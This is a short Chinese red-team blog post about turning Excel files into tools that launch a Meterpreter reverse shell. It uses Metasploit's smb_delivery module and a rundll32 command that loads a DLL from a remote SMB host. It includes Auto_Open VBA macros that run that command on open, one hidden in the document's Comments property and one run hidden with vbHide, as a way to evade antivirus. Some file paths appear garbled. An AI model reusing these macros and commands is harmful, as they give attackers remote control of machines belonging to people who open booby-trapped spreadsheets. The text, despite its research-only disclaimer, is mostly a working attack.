0x01 前言
通过Excel
文件运行命令行以生成Meterpreter
反向shell的不同方法,尝试使用这种方式来尝试Bypass_AV
0x02 SMB_Deliver Exploit
Metasploit SMB
传递模块通过SMB
服务器提供.dll
有效负载,并执行生成的有效负载的命令。
Msfconsole:
use exploit/windows/smb/smb_delivery
执行
exploit
会自动设置meterpreter_reverse_tcp
有效负载,以便在受害机器上打开Meterpreter反向 shell
我在我们的测试环境执行命令
rundll32.exe \192.168.190.128321.dll,0
#爬坑: 在Win10上需要SMB2或更高版本的错误
http://www.ghost580.com/win10/2018-11-10/26476.html
反向shell成功执行
0x03 Excel 武器化
VBS 宏脚本
Code:
Sub Auto_Open()
Call Shell("cmd.exe /c rundll32.exe \192.168.190.128321.dll,0", )
End Sub
发现简单的宏文件是无法绕过AV
的
在备注插入命令宏执行
在备注下插入命令行,宏文件代码Code:
Sub Auto_Open()
Dim prop As DocumentProperty
For Each prop In ActiveWorkbook.BuiltinDocumentProperties
If prop.Name = "Comments" Then
Shell prop.Value
End If
Next
End Sub
自定义公式执行
为了运行命令行,我创建了一个适合我们的自定义公式
自定义按钮内的 VBS 宏脚本
我在自定义按钮中插入了 VBS 宏脚本Code:
Sub Auto_Open()
Call Shell("rundll32.exe \192.168.190.128321.dll,0", vbHide)
End Sub
保存为.xls文件然后打开发现可以反向Shell
0x04 结尾
单纯记录一下,大佬们不喜勿喷
本文始发于微信公众号(不懂安全的校长):红队技巧 | 武器化Excel
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论